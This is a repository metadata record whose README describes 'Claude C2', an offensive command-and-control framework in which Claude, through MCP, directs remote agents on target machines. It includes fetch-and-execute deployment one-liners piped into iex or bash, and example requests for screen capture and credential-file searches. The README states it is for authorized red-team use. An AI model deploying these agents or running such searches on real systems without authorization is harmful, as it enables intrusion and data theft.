{"id":34248209,"url":"https://github.com/0xyg3n/claude-c2","last_synced_at":"2026-04-16T14:42:53.562Z","repository":{"id":327659898,"uuid":"1110224439","full_name":"0xyg3n/claude-c2","owner":"0xyg3n","description":"AI-Powered Command \u0026 Control Framework using Claude's Model Context Protocol (MCP)","archived":false,"fork":false,"pushed_at":"2025-12-13T12:52:17.000Z","size":440,"stargazers_count":2,"open_issues_count":0,"forks_count":1,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-12-19T16:48:28.621Z","etag":null,"topics":["c2","claude","command-and-control","implant","mcp","offensive-security","penetration-testing","rat","red-team","security"],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xyg3n.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-12-04T22:15:09.000Z","updated_at":"2025-12-13T12:52:20.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/0xyg3n/claude-c2","commit_stats":null,"previous_names":["0xyg3n/claude-c2"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/0xyg3n/claude-c2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xyg3n%2Fclaude-c2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xyg3n%2Fclaude-c2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xyg3n%2Fclaude-c2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xyg3n%2Fclaude-c2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xyg3n","download_url":"https://codeload.github.com/0xyg3n/claude-c2/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xyg3n%2Fclaude-c2/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31891038,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-16T11:36:10.202Z","status":"ssl_error","status_checked_at":"2026-04-16T11:36:09.652Z","response_time":69,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2","claude","command-and-control","implant","mcp","offensive-security","penetration-testing","rat","red-team","security"],"created_at":"2025-12-16T08:06:17.211Z","updated_at":"2026-04-16T14:42:53.556Z","avatar_url":"https://github.com/0xyg3n.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n\n\u003cimg src=\"https://raw.githubusercontent.com/0xyg3n/claude-c2/main/docs/logo.svg\" alt=\"Claude C2\" width=\"120\"\u003e\n\n# Claude C2\n\n### AI-Powered Command \u0026 Control Framework\n\n[![Platform](https://img.shields.io/badge/Windows%20%7C%20Linux%20%7C%20macOS%20%7C%20Android-blue?style=for-the-badge)](https://github.com/0xyg3n/claude-c2)\n[![MCP](https://img.shields.io/badge/Claude-MCP-7C3AED?style=for-the-badge)](https://claude.ai)\n[![Node](https://img.shields.io/badge/Node.js-18+-339933?style=for-the-badge\u0026logo=node.js\u0026logoColor=white)](https://nodejs.org)\n\n\u003cbr\u003e\n\n\u003cimg src=\"https://raw.githubusercontent.com/0xyg3n/claude-c2/main/docs/demo.gif\" alt=\"Demo\" width=\"700\"\u003e\n\n\u003cbr\u003e\n\n**Natural language control of remote systems through Claude AI and Model Context Protocol**\n\n\u003cbr\u003e\n\n[Overview](#overview) · [Architecture](#architecture) · [Installation](#installation) · [Deployment](#deployment) · [Documentation](#documentation)\n\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Overview\n\nClaude C2 is a command and control framework that integrates with Anthropic's Model Context Protocol (MCP), enabling operators to manage remote systems through natural language conversations with Claude AI.\n\nRather than memorizing command syntax across different operating systems, operators communicate intent in plain English. The AI interprets requests, selects appropriate targets, executes the necessary commands, and returns formatted results.\n\n```\nOperator:  \"Show me all connected systems\"\nClaude:    [Queries client manager, returns formatted list with OS, hostname, IP, user context]\n\nOperator:  \"Capture the screen on the Windows workstation\"\nClaude:    [Identifies target, executes screenshot, saves to server, confirms completion]\n\nOperator:  \"Search for configuration files containing credentials\"\nClaude:    [Runs recursive search with appropriate OS commands, returns matching paths]\n```\n\n\u003cbr\u003e\n\n### Key Characteristics\n\n| Feature | Description |\n|:--------|:------------|\n| **Natural Language Interface** | Communicate with targets through conversational English |\n| **Cross-Platform** | Unified control across Windows, Linux, macOS, and Android |\n| **Adaptive Execution** | AI automatically translates intent to OS-specific commands |\n| **Minimal Footprint** | Agents use native scripting tools with no additional binaries |\n| **Encrypted Transport** | TLS-secured WebSocket connections with OAuth 2.0 authentication |\n| **Auto-Recovery** | Agents automatically reconnect on connection loss |\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Architecture\n\n```\n┌────────────────────────────────────────────────────────────────────────────┐\n│                                                                            │\n│                           CLAUDE C2 ARCHITECTURE                           │\n│                                                                            │\n├────────────────────────────────────────────────────────────────────────────┤\n│                                                                            │\n│    ┌──────────────┐         ┌──────────────┐         ┌──────────────┐     │\n│    │              │         │              │         │              │     │\n│    │   OPERATOR   │   MCP   │   COMMAND    │   WSS   │    TARGET    │     │\n│    │              │◄───────►│              │◄───────►│              │     │\n│    │  Claude.ai   │   SSE   │    SERVER    │  JSON   │    AGENTS    │     │\n│    │              │         │              │         │              │     │\n│    └──────────────┘         └──────────────┘         └──────────────┘     │\n│                                                                            │\n│         │                         │                         │             │\n│         │  Natural language       │  Command routing        │  Shell      │\n│         │  requests/responses     │  Client management      │  execution  │\n│         │  via Claude AI          │  OAuth + TLS            │  Results    │\n│         │                         │                         │             │\n│                                                                            │\n└────────────────────────────────────────────────────────────────────────────┘\n```\n\n**Communication Flow:**\n\n1. Operator interacts with Claude AI through claude.ai interface\n2. Claude connects to C2 server via MCP (Model Context Protocol) over SSE\n3. Server maintains persistent WebSocket connections to all deployed agents\n4. Commands are routed to appropriate agents based on operator intent\n5. Agents execute commands using native OS tools and return results\n6. Claude formats and presents results to operator\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Installation\n\n### Prerequisites\n\n- Node.js 18 or higher\n- Valid SSL certificate (Let's Encrypt recommended)\n- Domain name pointing to server\n- Network access on ports 443, 3101, 3102\n\n### Server Setup\n\n```bash\n# Clone repository\ngit clone https://github.com/0xyg3n/claude-c2.git\ncd claude-c2\n\n# Install dependencies\nnpm install\n\n# Configure environment\ncp .env.example .env\n```\n\nEdit `.env` with your configuration:\n\n```env\nDOMAIN=your-domain.com\nMCP_PORT=3101\nWS_PORT=3102\nOAUTH_CLIENT_ID=your-client-id\nOAUTH_CLIENT_SECRET=your-client-secret\nSSL_CERT_PATH=/path/to/cert.pem\nSSL_KEY_PATH=/path/to/key.pem\n```\n\n```bash\n# Start server\nnpm start\n```\n\n### Claude.ai Integration\n\nConfigure MCP connector in Claude.ai settings:\n\n| Parameter | Value |\n|:----------|:------|\n| Server URL | `https://your-domain.com/mcp/sse` |\n| Authentication | OAuth 2.0 |\n| Client ID | Value from `.env` |\n| Client Secret | Value from `.env` |\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Deployment\n\nDeploy agents to target systems using platform-specific one-liners:\n\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth align=\"center\"\u003ePlatform\u003c/th\u003e\n\u003cth\u003eDeployment Command\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd align=\"center\"\u003e\u003cb\u003eWindows\u003c/b\u003e\u003c/td\u003e\n\u003ctd\u003e\n\n```powershell\nirm https://YOUR_DOMAIN/agent/windows | iex\n```\n\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd align=\"center\"\u003e\u003cb\u003eLinux\u003c/b\u003e\u003c/td\u003e\n\u003ctd\u003e\n\n```bash\ncurl -s https://YOUR_DOMAIN/agent/linux | bash\n```\n\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd align=\"center\"\u003e\u003cb\u003emacOS\u003c/b\u003e\u003c/td\u003e\n\u003ctd\u003e\n\n```bash\ncurl -s https://YOUR_DOMAIN/agent/macos | bash\n```\n\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd align=\"center\"\u003e\u003cb\u003eAndroid\u003c/b\u003e\u003c/td\u003e\n\u003ctd\u003e\n\n```bash\ncurl -s https://YOUR_DOMAIN/agent/termux | bash\n```\n\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\nAgents operate in memory without persistence by default. Connection resilience is built-in with automatic reconnection on network interruption.\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Usage Examples\n\n| Request | Action |\n|:--------|:-------|\n| `\"List all connected clients\"` | Display all active agents with system information |\n| `\"Execute whoami on target\"` | Run command and return output |\n| `\"Take a screenshot\"` | Capture display and save to server |\n| `\"Find all PDF documents\"` | Recursive filesystem search |\n| `\"Show network configuration\"` | Execute ipconfig/ifconfig based on OS |\n| `\"List running processes\"` | Display process list with details |\n| `\"Open URL on Android device\"` | Launch browser with specified URL |\n\nWhen a single agent is connected, Claude automatically selects it. With multiple agents, specify the target by name or identifier.\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Demonstrated Platforms\n\n\u003cdiv align=\"center\"\u003e\n\n| Windows 11 | Android (Termux) |\n|:----------:|:----------------:|\n| \u003cimg src=\"https://raw.githubusercontent.com/0xyg3n/claude-c2/main/docs/poc-windows.png\" width=\"320\"\u003e | \u003cimg src=\"https://raw.githubusercontent.com/0xyg3n/claude-c2/main/docs/poc-termux.png\" width=\"320\"\u003e |\n| Full agent functionality | Termux environment with API access |\n\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Documentation\n\n| Document | Description |\n|:---------|:------------|\n| [Integration Guide](docs/INTEGRATIONS.md) | Claude.ai configuration and API setup |\n| [Android Operations](docs/ANDROID-TERMUX.md) | Termux-specific features and Termux:API |\n\n\u003cbr\u003e\n\n---\n\n\u003cbr\u003e\n\n## Legal Notice\n\n\u003ctable\u003e\n\u003ctr\u003e\n\u003ctd\u003e\n\n**This software is provided strictly for authorized security testing, educational research, and legitimate penetration testing engagements.**\n\nBy using this software, you acknowledge and agree to the following:\n\n- You have obtained **explicit written authorization** for any systems tested\n- You understand that unauthorized access to computer systems is a **criminal offense** under applicable laws including but not limited to the Computer Fraud and Abuse Act (CFAA), Computer Misuse Act, and equivalent legislation in your jurisdiction\n- The authors and contributors accept **no responsibility or liability** for any misuse, damage, or illegal activities conducted with this software\n- You assume **full legal responsibility** for your use of this software\n\nThis tool is intended exclusively for:\n- Licensed penetration testers with valid authorization\n- Red team operators with written scope agreements\n- Security researchers in controlled environments\n- Educational purposes in authorized lab settings\n\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/table\u003e\n\n\u003cbr\u003e\n\n---\n\n\u003cdiv align=\"center\"\u003e\n\n\u003csub\u003e\n\n**Claude C2** — Built on Anthropic's Model Context Protocol\n\n\u003c/sub\u003e\n\n\u003c/div\u003e\n# Claude C2 - Updated Mon Dec  8 13:44:11 EET 2025\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xyg3n%2Fclaude-c2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xyg3n%2Fclaude-c2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xyg3n%2Fclaude-c2/lists"}